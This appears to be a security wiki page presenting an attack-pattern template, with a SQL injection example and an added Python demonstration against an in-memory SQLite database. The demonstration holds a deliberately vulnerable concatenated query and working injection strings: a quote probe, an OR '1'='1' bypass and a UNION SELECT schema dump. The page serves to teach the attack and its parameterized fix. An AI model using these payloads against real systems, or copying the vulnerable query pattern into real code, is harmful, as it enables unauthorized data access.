Attack Pattern Template

From Guidance Share

Description

Attack patterns describe an attack from the viewpoint and perspective of the attacker.

  • Context explains the circumstances / environment in which the attack presents a risk.
  • Problem explains the goals of the attacker.
  • Forces define the motivation of the attacker.
  • Solution defines the steps the attacker takes to perform the attack.

Template

Context

Under what circumstances is the attack relevant?

Problem

What is the attacker trying to achieve?

Forces

Why will the attacker perform the attack?

Solution

What steps does the attacker perform to conduct the attack?

Example

Context

You have an application that accesses a database and builds its queries from user input. The target application does not use type-safe (parameterized) queries, so input becomes part of the SQL text.

Problem

How to execute unauthorized SQL in the database, for example to reveal sensitive data, perform unauthorized transactions, or manipulate or damage the database.

Forces

  • You want to read or modify data that you would not otherwise have access to.
  • You want to cause a database exception which might reveal database information.

Solution

  • Look for sources of input that reach a query (form fields, query string parameters, cookies, headers).
  • Place sample SQL injection attack strings (for example a single quote) in each input location.
  • Look for database errors in the response; an error shows that the input reached the SQL parser unescaped.
  • If a database error is found, craft an attack string that executes the desired SQL statement in that location.
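The example below walks the four Solution steps against a small in-memory SQLite database. It is an added illustration, not code from the original page: the accounts table, the row data, the two lookup functions and the attack strings are all constructed here. The vulnerable lookup concatenates input into the query text, as the Context describes; the parameterized lookup is included beside it so the same probes can be seen failing against a type-safe query.

```python
import sqlite3


def build_db():
    """Constructed sample data (not from the page): an accounts table with
    rows the attacker is not supposed to be able to read."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER, owner TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [(1, "alice", 100), (2, "bob", 250), (3, "carol", 999)],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, owner):
    """The Context of the pattern: the query is built by string concatenation,
    so whatever the caller supplies becomes SQL syntax."""
    sql = "SELECT id, owner, balance FROM accounts WHERE owner = '" + owner + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, owner):
    """The type-safe alternative: the input is bound as a parameter and is
    only ever treated as data, never as SQL."""
    return conn.execute(
        "SELECT id, owner, balance FROM accounts WHERE owner = ?", (owner,)
    ).fetchall()


def probe_for_error(lookup, conn, attack_string="'"):
    """Solution steps 2 and 3: send a sample attack string (an unbalanced
    quote) into the input location and look for a database error.
    Returns the error text if the parser choked on the input, else None."""
    try:
        lookup(conn, attack_string)
        return None
    except sqlite3.Error as exc:
        return str(exc)


# Solution step 4: crafted strings for the position found by the probe.
# Hypothetical attack strings constructed for this example.
BYPASS_FILTER = "alice' OR '1'='1"
DUMP_SCHEMA = "x' UNION SELECT 1, name, sql FROM sqlite_master --"


def run_pattern(lookup, conn):
    """Walk the Solution steps against one input location and report the outcome.
    Only if the probe produced an error are the crafted strings worth sending."""
    report = {"error": probe_for_error(lookup, conn), "all_rows": [], "schema": []}
    if report["error"] is None:
        return report
    # The quote reached the parser: the WHERE clause can now be rewritten.
    report["all_rows"] = lookup(conn, BYPASS_FILTER)
    # And a UNION can pull rows from a table the query never mentioned.
    report["schema"] = lookup(conn, DUMP_SCHEMA)
    return report


if __name__ == "__main__":
    db = build_db()
    for name, fn in (("vulnerable", lookup_vulnerable), ("safe", lookup_safe)):
        result = run_pattern(fn, db)
        print(name, "->", "error:", result["error"])
        print("   rows via OR bypass:", result["all_rows"])
        print("   rows via UNION    :", result["schema"])
```

Against the concatenating lookup the single-quote probe returns a parser error, the OR payload returns every account, and the UNION payload returns the CREATE TABLE text from sqlite_master. Against the parameterized lookup every one of those strings is simply an owner name that matches nothing, which is why the pattern lists a missing error as the signal to move on to another input location.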